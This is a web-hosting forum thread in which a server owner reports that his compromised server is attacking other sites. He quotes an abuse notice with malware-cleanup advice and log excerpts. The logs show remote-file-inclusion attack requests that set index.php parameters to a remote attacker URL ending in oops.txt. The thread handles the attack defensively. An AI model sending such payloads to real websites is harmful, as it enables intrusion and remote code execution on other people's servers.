Need some help quick please

RadMan

Verified User
Joined
Apr 12, 2007
Messages
209
Location
Canada
I think my server has been hacked and it's attacking other servers..

I thought my colo was off the his rocker when he first complained to me yesterday.. Today he got another notification from a different source...

Need an experienced Linux/CentOS server admin to check out my server and correct any issues he/she may find..
======================

NOTES:



This type of attack typically mean the server for which the IP address

of the attacker is bound is a compromised server.



Please check the server behind the IP address above for suspicious

files in /tmp, /var/tmp, /dev/shm, /var/spool/samba, /var/spool/vbox,

/var/spool/squid, and /var/spool/cron Please use "ls -lab" for

checking directories as sometimes compromised servers will have hidden

files that a regular "ls" will not show.



Please also check the process tree (ps -efl or ps -auwx) for

suspicious processes; often times the malware / hack pretends to be an

Apache process.



Linux Malware Detect is an excellent program for finding malware on a

server. You can find the latest version at

http://www.rfxn.com/projects/linux-malware-detect/



Clam Anti-virus, clamscan, can also be used to find commonly used PHP

and Perl-based hacks, including various php shells, on a server using

the “--infected” and “--recursive” options.



You may also want to check out using root kit detection tools -

http://www.chkrootkit.org/, http://www.rootkit.nl/, and

http://www.ossec.net/en/rootcheck.html as tools which should be used

in addition to checking the directories and process tree.



### EOF NOTES ###



Please take appropriate action to stop these attacks from happening.



Thank you very much for your time.


Code:
Type of attack:

 

Sample log report including date and time stamp (1st field is the word

"request", 2nd field is the IP address or the domain name being

attacked, and the 3rd field is the IP address or domain name of the

attacker):

 

  Request: darklite.ie 204.15.197.36 - - [23/Nov/2012:20:33:36 +0000]

"GET /index.php?lang=http://5.9.188.62/oops.txt? HTTP/1.1" 500 3518

"-" "-" UK-doFQz7pAAADzVrsk "-"

 Request: darklite.ie 204.15.197.36 - - [23/Nov/2012:20:33:48 +0000]

"GET /index.php?main=http://5.9.188.62/oops.txt? HTTP/1.1" 500 3518

"-" "-" UK-drFQz7pAAAF0ChVY "-"

 Request: darklite.ie 204.15.197.36 - - [23/Nov/2012:20:33:59 +0000]

"GET /index.php?go=http://5.9.188.62/oops.txt? HTTP/1.1" 500 3518 "-"

"-" UK-dt1Qz7pAAADzLoi8 "-"

 Request: darklite.ie 204.15.197.36 - - [23/Nov/2012:20:34:10 +0000]

"GET /index.php?goto=http://5.9.188.62/oops.txt? HTTP/1.1" 500 3518

"-" "-" UK-dwlQz7pAAADzInIY "-"

 Request: darklite.ie 204.15.197.36 - - [23/Nov/2012:20:34:21 +0000]

"GET /index.php?jump=http://5.9.188.62/oops.txt? HTTP/1.1" 500 3518

"-" "-" UK-dzVQz7pAAADzFmuE "-"

 Request: darklite.ie 204.15.197.36 - - [23/Nov/2012:20:34:32 +0000]

"GET /index.php?url=http://5.9.188.62/oops.txt? HTTP/1.1" 500 3518 "-"

"-" UK-d2FQz7pAAAF1no7s "-"

 Request: darklite.ie 204.15.197.36 - - [23/Nov/2012:20:34:43 +0000]

"GET /index.php?lng=http://5.9.188.62/oops.txt? HTTP/1.1" 500 3518 "-"

"-" UK-d41Qz7pAAADzdvYM "-"

 Request: darklite.ie 204.15.197.36 - - [23/Nov/2012:20:34:54 +0000]

"GET /index.php?get=http://5.9.188.62/oops.txt? HTTP/1.1" 500 3518 "-"

"-" UK-d7lQz7pAAADywcZ0 "-"

 Request: darklite.ie 204.15.197.36 - - [23/Nov/2012:20:35:05 +0000]

"GET /index.php?link=http://5.9.188.62/oops.txt? HTTP/1.1" 500 3518

"-" "-" UK-d@VQz7pAAADy9lTA "-"

 Request: darklite.ie 204.15.197.36 - - [23/Nov/2012:20:35:16 +0000]

"GET /index.php?open=http://5.9.188.62/oops.txt? HTTP/1.1" 500 3518

"-" "-" UK-eBFQz7pAAADzfwII "-"

 Request: thelimousinecompany.ie 204.15.197.36 - -

[23/Nov/2012:20:58:53 +0000] "GET

/index.php?lang=http://5.9.188.62/oops.txt? HTTP/1.1" 500 3506 "-" "-"

UK-jjVQz7pAAAGMpHwk "-"

 Request: holidayfinders.ie 204.15.197.36 - - [23/Nov/2012:20:58:53

+0000] "GET /index.php?lang=http://5.9.188.62/oops.txt? HTTP/1.1" 500

3506 "-" "-" UK-jjVQz7pAAAGM3K@A "-"

 Request: thelimousinecompany.ie 204.15.197.36 - -

[23/Nov/2012:20:59:05 +0000] "GET

/index.php?main=http://5.9.188.62/oops.txt? HTTP/1.1" 500 3506 "-" "-"

UK-jmVQz7pAAABz8XSc "-"

 Request: holidayfinders.ie 204.15.197.36 - - [23/Nov/2012:20:59:06

+0000] "GET /index.php?main=http://5.9.188.62/oops.txt? HTTP/1.1" 500

3506 "-" "-" UK-jmlQz7pAAABx2DqI "-"

 Request: thelimousinecompany.ie 204.15.197.36 - -

[23/Nov/2012:20:59:17 +0000] "GET

/index.php?go=http://5.9.188.62/oops.txt? HTTP/1.1" 500 3506 "-" "-"

UK-jpVQz7pAAAGMpHww "-"

 Request: holidayfinders.ie 204.15.197.36 - - [23/Nov/2012:20:59:17

+0000] "GET /index.php?go=http://5.9.188.62/oops.txt? HTTP/1.1" 500

3506 "-" "-" UK-jpVQz7pAAABx8GVM "-"

 Request: thelimousinecompany.ie 204.15.197.36 - -

[23/Nov/2012:20:59:29 +0000] "GET

/index.php?goto=http://5.9.188.62/oops.txt? HTTP/1.1" 500 3506 "-" "-"

UK-jsVQz7pAAADzPqGw "-"

 Request: holidayfinders.ie 204.15.197.36 - - [23/Nov/2012:20:59:29

+0000] "GET /index.php?goto=http://5.9.188.62/oops.txt? HTTP/1.1" 500

3506 "-" "-" UK-jsVQz7pAAADzSqfc "-"

 Request: thelimousinecompany.ie 204.15.197.36 - -

[23/Nov/2012:20:59:40 +0000] "GET

/index.php?jump=http://5.9.188.62/oops.txt? HTTP/1.1" 500 3506 "-" "-"

UK-jvFQz7pAAABx4Ebg "-"

 Request: holidayfinders.ie 204.15.197.36 - - [23/Nov/2012:20:59:40

+0000] "GET /index.php?jump=http://5.9.188.62/oops.txt? HTTP/1.1" 500

3506 "-" "-" UK-jvFQz7pAAAByOINM "-"

 Request: thelimousinecompany.ie 204.15.197.36 - -

[23/Nov/2012:20:59:51 +0000] "GET

/index.php?url=http://5.9.188.62/oops.txt? HTTP/1.1" 500 3506 "-" "-"

UK-jx1Qz7pAAABx2Dqw "-"

 Request: holidayfinders.ie 204.15.197.36 - - [23/Nov/2012:20:59:51

+0000] "GET /index.php?url=http://5.9.188.62/oops.txt? HTTP/1.1" 500

3506 "-" "-" UK-jx1Qz7pAAAGMrI-U "-"

 Request: thelimousinecompany.ie 204.15.197.36 - -

[23/Nov/2012:21:00:03 +0000] "GET

/index.php?lng=http://5.9.188.62/oops.txt? HTTP/1.1" 500 3506 "-" "-"

UK-j01Qz7pAAAGMrI-c "-"

 Request: holidayfinders.ie 204.15.197.36 - - [23/Nov/2012:21:00:03

+0000] "GET /index.php?lng=http://5.9.188.62/oops.txt? HTTP/1.1" 500

3506 "-" "-" UK-j01Qz7pAAAGMpHxM "-"

 Request: thelimousinecompany.ie 204.15.197.36 - -

[23/Nov/2012:21:00:15 +0000] "GET

/index.php?get=http://5.9.188.62/oops.txt? HTTP/1.1" 500 3506 "-" "-"

UK-j31Qz7pAAAGMpHxU "-"

 Request: holidayfinders.ie 204.15.197.36 - - [23/Nov/2012:21:00:15

+0000] "GET /index.php?get=http://5.9.188.62/oops.txt? HTTP/1.1" 500

3506 "-" "-" UK-j31Qz7pAAABx2DrI "-"

 Request: thelimousinecompany.ie 204.15.197.36 - -

[23/Nov/2012:21:00:27 +0000] "GET

/index.php?link=http://5.9.188.62/oops.txt? HTTP/1.1" 500 3506 "-" "-"

UK-j61Qz7pAAADzKodQ "-"

 Request: holidayfinders.ie 204.15.197.36 - - [23/Nov/2012:21:00:28

+0000] "GET /index.php?link=http://5.9.188.62/oops.txt? HTTP/1.1" 500

3506 "-" "-" UK-j7FQz7pAAADzFm8I "-"
TIA

Ed
 
Last edited:

SeLLeRoNe

Super Moderator
Joined
Oct 9, 2004
Messages
6,794
Location
A Coruña, Spain
Hi,

im avaible to this kind of service. Feel free to PM me or send me an email (my mail in signature) for a quote.

Regards
 

RadMan

Verified User
Joined
Apr 12, 2007
Messages
209
Location
Canada
Hi John.. Scott is still running a scan to source it...

Server has now been updated with the latest versions of pretty well everything including csf v5.71...

It's been running without interruption for almost 700 days.. I'm counting myself lucky :)

Thanks for asking :)

Ed
 

RadMan

Verified User
Joined
Apr 12, 2007
Messages
209
Location
Canada
Updating the server seems to have corrected the issues.. No more complaints now.. Not sure what the source of entry was.. :(
 

samadi

New member
Joined
Dec 7, 2012
Messages
1
please help me

please help me

hello.
I delete all folder and files in my control panel
how can repair my site I havnot any back up.
how can I reset my hosting?
please
 

zEitEr

Super Moderator
Joined
Apr 11, 2005
Messages
14,255
Location
GMT +7.00
Hello,

You might want to send me a PM (in English), or a letter in a Russian language through my web-site (see my signature lines).
 
Top